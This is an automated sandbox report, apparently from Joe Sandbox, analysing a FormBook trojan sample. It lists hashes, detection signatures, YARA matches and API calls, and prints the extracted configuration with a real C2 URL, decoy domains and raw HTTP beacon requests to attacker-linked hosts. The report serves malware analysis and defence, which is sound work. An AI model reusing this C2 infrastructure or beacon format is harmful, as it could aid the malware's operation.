Analysis Report GiG35Rwmz6

Overview

General Information

Sample Name:	GiG35Rwmz6 (renamed file extension from none to exe)
Analysis ID:	432733
MD5:	b0901d0a6b90e6b371ba80e2c31ade52
SHA1:	2f175d971e4d6f4938083a78de9be10eb6ba0e05
SHA256:	08da4e7de40f2eec9cd1670e3db354d49d3101fd9ace7aaa5f99b235d2ce46ff
Tags:	exetrojan
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

AV Detection:

Antivirus / Scanner detection for submitted sample

Source: GiG35Rwmz6.exe

Avira: detected

Found malware configuration

Source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.studiooculto.com/n8ud/"], "decoy": ["certification-plus.com", "linkedoutbook.com", "bethesdalashes.com", "blazingthenet.com", "lohmanphotogallery.com", "solidlinks.info", "alvingohproperty.com", "hometheaterplanning.com", "beoke.com", "ddthi.com", "floridamotorcyclemasons.net", "stither.com", "majorhumanities.com", "palpaynaira.com", "webossgoo.com", "thebrck.com", "crackhook.com", "363dahlia.com", "mybusiness-plus.com", "seatachawaiianbarbecue.com", "uoekiqliea.net", "zyslz.com", "frightvision.online", "gordonenergysolutions.com", "matthewcoyte.com", "hackingnews.info", "royallondonhair.com", "thegioirc.com", "856380588.xyz", "popitara.com", "luisxe.info", "cbdthc.domains", "869bernardilane.com", "airikit.com", "centraldomusmatera.com", "onlinecreditnow.com", "ilamaths.com", "janeharriganhorn.com", "fullapologies.com", "xpfisioterapia.com", "spring-boot.com", "wrighttransportllc.com", "nemahealthcare.com", "taxikuka.com", "promoterss.com", "kirklandtroll.com", "aviationbrothers.com", "fylldagenebergen.com", "vycocover.com", "cookingsecret.net", "intentguild.com", "athenalim.com", "nothingoingapart.info", "neurosene.com", "doctorelizabethwise.com", "lalamasks.cloud", "livemaharashtra24.com", "catrinettealyssandre.com", "wovkreations.com", "piapiadine.com", "uebfaushb.com", "curlupanddyesc.com", "seniorbenefits.support", "didyouswipe.com"]}

Multi AV Scanner detection for submitted file

Source: GiG35Rwmz6.exe	Virustotal: Detection: 40%			Perma Link
Source: GiG35Rwmz6.exe	ReversingLabs: Detection: 34%

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.0.GiG35Rwmz6.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GiG35Rwmz6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.GiG35Rwmz6.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GiG35Rwmz6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Source: GiG35Rwmz6.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 4.0.GiG35Rwmz6.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.GiG35Rwmz6.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe

Unpacked PE file: 0.2.GiG35Rwmz6.exe.3c0000.0.unpack

Uses 32bit PE files

Source: GiG35Rwmz6.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: GiG35Rwmz6.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.692755022.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: GiG35Rwmz6.exe, 00000004.00000002.729465784.000000000108F000.00000040.00000001.sdmp, help.exe, 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: GiG35Rwmz6.exe, 00000004.00000002.729465784.000000000108F000.00000040.00000001.sdmp, help.exe
Source:	Binary string: help.pdbGCTL source: GiG35Rwmz6.exe, 00000004.00000002.729233616.0000000000F60000.00000040.00000001.sdmp
Source:	Binary string: help.pdb source: GiG35Rwmz6.exe, 00000004.00000002.729233616.0000000000F60000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.692755022.0000000005A00000.00000002.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4x nop then pop ebx		4_2_00407B0A
Source: C:\Windows\SysWOW64\help.exe	Code function: 4x nop then pop ebx		9_2_02417B0A

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.studiooculto.com/n8ud/

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /n8ud/?vPE=5jrT8R0&hL=WvvELDNeXjXNSBNWuUY8Zfoe6Ppc+GsA8iptXd2KegdndXiZdpjCN7GBAWkC1K0OIvRU HTTP/1.1Host: www.intentguild.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ud/?hL=xx0OFN/A1LQZVCJMLzEbxnX8OnCdv1d2voKBm1sodMz7PL+00tIAVi4krCco92VzLf77&vPE=5jrT8R0 HTTP/1.1Host: www.didyouswipe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: IOFLOODUS IOFLOODUS
Source: Joe Sandbox View	ASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK

Source: global traffic	HTTP traffic detected: GET /n8ud/?vPE=5jrT8R0&hL=WvvELDNeXjXNSBNWuUY8Zfoe6Ppc+GsA8iptXd2KegdndXiZdpjCN7GBAWkC1K0OIvRU HTTP/1.1Host: www.intentguild.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ud/?hL=xx0OFN/A1LQZVCJMLzEbxnX8OnCdv1d2voKBm1sodMz7PL+00tIAVi4krCco92VzLf77&vPE=5jrT8R0 HTTP/1.1Host: www.didyouswipe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.intentguild.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Jun 2021 15:55:40 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000000.680176172.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.0.GiG35Rwmz6.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GiG35Rwmz6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.GiG35Rwmz6.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GiG35Rwmz6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.GiG35Rwmz6.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.GiG35Rwmz6.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.GiG35Rwmz6.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.GiG35Rwmz6.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.GiG35Rwmz6.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.GiG35Rwmz6.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.GiG35Rwmz6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.GiG35Rwmz6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Contains functionality to call native functions

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041A060 NtClose,	4_2_0041A060
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041A110 NtAllocateVirtualMemory,	4_2_0041A110
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00419F30 NtCreateFile,	4_2_00419F30
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00419FE0 NtReadFile,	4_2_00419FE0
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041A05A NtClose,	4_2_0041A05A
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041A10A NtAllocateVirtualMemory,	4_2_0041A10A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC96E0 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_02AC96E0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC96D0 NtCreateKey,LdrInitializeThunk,	9_2_02AC96D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9660 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_02AC9660
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9650 NtQueryValueKey,LdrInitializeThunk,	9_2_02AC9650
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9A50 NtCreateFile,LdrInitializeThunk,	9_2_02AC9A50
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9780 NtMapViewOfSection,LdrInitializeThunk,	9_2_02AC9780
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9FE0 NtCreateMutant,LdrInitializeThunk,	9_2_02AC9FE0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9710 NtQueryInformationToken,LdrInitializeThunk,	9_2_02AC9710
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9860 NtQuerySystemInformation,LdrInitializeThunk,	9_2_02AC9860
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9840 NtDelayExecution,LdrInitializeThunk,	9_2_02AC9840
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC99A0 NtCreateSection,LdrInitializeThunk,	9_2_02AC99A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC95D0 NtClose,LdrInitializeThunk,	9_2_02AC95D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_02AC9910
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9540 NtReadFile,LdrInitializeThunk,	9_2_02AC9540
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9A80 NtOpenDirectoryObject,	9_2_02AC9A80
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9A20 NtResumeThread,	9_2_02AC9A20
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9A00 NtProtectVirtualMemory,	9_2_02AC9A00
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9610 NtEnumerateValueKey,	9_2_02AC9610
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9A10 NtQuerySection,	9_2_02AC9A10
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9670 NtQueryInformationProcess,	9_2_02AC9670
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC97A0 NtUnmapViewOfSection,	9_2_02AC97A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ACA3B0 NtGetContextThread,	9_2_02ACA3B0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9730 NtQueryVirtualMemory,	9_2_02AC9730
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9B00 NtSetValueKey,	9_2_02AC9B00
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ACA710 NtOpenProcessToken,	9_2_02ACA710
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9760 NtOpenProcess,	9_2_02AC9760
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9770 NtSetInformationFile,	9_2_02AC9770
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ACA770 NtOpenThread,	9_2_02ACA770
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC98A0 NtWriteVirtualMemory,	9_2_02AC98A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC98F0 NtReadVirtualMemory,	9_2_02AC98F0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9820 NtEnumerateKey,	9_2_02AC9820
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ACB040 NtSuspendThread,	9_2_02ACB040
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC95F0 NtQueryInformationFile,	9_2_02AC95F0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC99D0 NtCreateProcessEx,	9_2_02AC99D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9520 NtWaitForSingleObject,	9_2_02AC9520
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ACAD30 NtSetContextThread,	9_2_02ACAD30
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9560 NtWriteFile,	9_2_02AC9560
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9950 NtQueueApcThread,	9_2_02AC9950
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242A060 NtClose,	9_2_0242A060
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242A110 NtAllocateVirtualMemory,	9_2_0242A110
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02429F30 NtCreateFile,	9_2_02429F30
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02429FE0 NtReadFile,	9_2_02429FE0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242A05A NtClose,	9_2_0242A05A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242A10A NtAllocateVirtualMemory,	9_2_0242A10A

Detected potential crypto function

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C82160	0_2_00C82160
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C81790	0_2_00C81790
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C8E7B8	0_2_00C8E7B8
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C85770	0_2_00C85770
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C80FF0	0_2_00C80FF0
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C850F8	0_2_00C850F8
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C82151	0_2_00C82151
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C85108	0_2_00C85108
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C85301	0_2_00C85301
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C85310	0_2_00C85310
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C80480	0_2_00C80480
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C80479	0_2_00C80479
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C85548	0_2_00C85548
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C85558	0_2_00C85558
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C81781	0_2_00C81781
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C85760	0_2_00C85760
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C84A69	0_2_00C84A69
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C84A78	0_2_00C84A78
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C84D69	0_2_00C84D69
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C83E80	0_2_00C83E80
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C83E71	0_2_00C83E71
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C80F48	0_2_00C80F48
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F309A0	0_2_09F309A0
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F3D288	0_2_09F3D288
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F39E14	0_2_09F39E14
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F30990	0_2_09F30990
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F39850	0_2_09F39850
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F35858	0_2_09F35858
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F39840	0_2_09F39840
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F35849	0_2_09F35849
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F30012	0_2_09F30012
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F373C0	0_2_09F373C0
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F373BD	0_2_09F373BD
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F35BA3	0_2_09F35BA3
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F34BA2	0_2_09F34BA2
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F30398	0_2_09F30398
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F30389	0_2_09F30389
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F35358	0_2_09F35358
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F35348	0_2_09F35348
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F35AF7	0_2_09F35AF7
